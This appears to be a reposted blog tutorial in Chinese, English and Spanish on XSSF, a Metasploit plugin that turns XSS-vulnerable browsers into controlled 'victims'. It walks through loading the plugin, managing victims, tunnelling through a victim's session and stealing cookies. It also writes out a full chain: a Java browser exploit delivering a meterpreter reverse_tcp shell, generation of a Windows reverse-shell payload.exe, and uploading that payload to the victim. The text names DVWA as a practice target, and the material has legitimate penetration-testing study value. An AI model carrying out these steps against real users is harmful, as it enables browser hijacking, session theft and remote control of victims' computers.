XSSF - Cross Site Scripting Framework

2019独角兽企业重金招聘Python工程师标准>>>

跨站脚本框架 (XSSF) 是一个设计用来快速发现网站存在XSS漏洞的一个安全工具集。该项目是为了验证网站存在的XSS漏洞及是被如何利用的。

XSSF允许同目标浏览器（一个存在XSS漏洞的）创建通信通道来实施攻击。用户可以免费选择已经存在的攻击模块来对目标浏览器实施攻击。

（英文太差，懒得翻译了，转成英文后大伙应该都能看懂。）
Xssf Framework allows you to manage victims of XSS attacks and generic persists victims a connection with them through a "loop" in javascript, which is responsible for sending requests reverse at defined intervals of time in order to execute exploits against the victim.

To use xssf in metasploit is necessary to locate a vulnerable application to XSS attacks, to test and improve skills in the field of web application security, there is a project called DVWA (Damn Vulnerable Web Application) is an application written in PHP MySQL and has enabled a number of vulnerabilities that allows a security professional, interact with the application and understanding of possible attacks that can be done in web applications.

XSSF documented provides a powerful API, which facilitates the development of modules and attacks. In addition, their integration into the Metasploit Framework allows users to start the MSF browser based exploit easilly XSS vulnerability.

Exploiting a XSS bug in the victim's browser could be to browse website on attacker's browser, using the victim's session connected. In most cases, simply stealing the victim cookie will be sufficient to do this.

However, in a few cases (intranet, network tools portals, etc.), the cookie will not be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

With XSS we can create a tunnel that will allow us to connect our victim from a web browser, the basic idea was to create a tunnel to serve as a proxy for communication between the application XSS vulnerability exploited and the attacker passed between the victim, in this way you can run some additional attack without revealing the identity of the attacker and using the identity of the victim.

The new version 4.6.0-dev MSF is supported by:

Backtrack 5R3
Ubuntu 12.04
Kali 1.0
Windows 7

Vulnerabilidades XSS (Cross Site Scripting )

Cross Site Scripting InDirecto (Reflejado) Reflective XSS
Cross Site Scripting Directo (Persistente)

Manual con ejemplos "XSS for fun and profit"

It allows:

stealing Cookies

Execute commands (via Javascript)

Execute attacks Denial of Service (DDoS)

XSSF con Metasploit

msfupdate cd /opt/metasploit/apps/pro/msf3 svn export http:/xssf.googlecode.com/svn/trunk ./ --force msfconsole

msf > load xssf Port=80

msf > help xssf

Result of the available commands:

xssf_active_victims Muestra víctimas activas.
xssf_add_auto_attack Añade un nuevo ataque automatizado (lanzado de forma automática en la conexión de la víctima).
xssf_auto_attacks Muestra XSSF ataques automatizados.
xssf_banner Prints Marco XSS bandera !
xssf_clean_victims Limpia víctimas en la base de datos ( eliminar ataques de espera).
xssf_exploit Lanza e introduce un módulo (que se ejecuta en uno de sus procesos ) en una víctima determinada.
xssf_information Muestra información sobre una víctima determinada.
xssf_log Muestra registro con un ID dado.
xssf_logs Muestra los registros sobre una víctima determinada.
xssf_remove_auto_attack Elimina un ataque automatizado.
xssf_remove_victims Elimina las víctimas en la base de datos.
xssf_restore_state Restaura el estado XSSF (víctimas , registros , etc) a partir del archivo de entrada.
xssf_save_state Guarda estatales XSSF (víctimas , registros , etc) en el archivo de salida.
xssf_servers Muestra todos los servidores de ataque utilizados.
xssf_tunnel Nos proporciona un túnel entre agresor y víctima.
xssf_urls Enumera las direcciones URL's disponibles útiles proporcionadas por XSSF.
xssf_victims Muestra todas las víctimas

Example of a victim using Internet Explorer 7 and a vulnerable version of Java in Windows XP.

xssf_victims

1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

[..]
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86
            [..]

    use exploit/multi/browser/java_atomicreferencearray    set PAYLOAD java/meterpreter/reverse_tcpset SRVHOST 192.168.23.200set URIPATH xssfset LHOST 192.168.23.200exploit -jjobs

Jobs
        ====
        Id Name
        – —-
        0 Exploit: multi/browser/java_atomicreferencearray

    xssf_exploit 1 0

[*] Searching Metasploit launched module with JobID = ’0′…
        [+] A running exploit exists: ‘Exploit: multi/browser/java_atomicreferencearray’
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code ‘Exploit: multi/browser/java_atomicreferencearray’ sent to victim ’1′
        [+] Remaining victims to attack: NONE

    show sessions

Active sessions
        ===============
        Id Type Information Connection
        – —- ———– ———-
        1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe

use exploit/multi/handler
exploit -j

upload /opt/metasploit/apps/pro/msf3/payload.exe c

background
sessions -i 1

PS:写文章不易呀，翻译也挺苦逼，虽然是翻译成英文，真心敬仰那些翻译大神！

via:Elhacker

转载于:https://my.oschina.net/u/1188877/blog/282206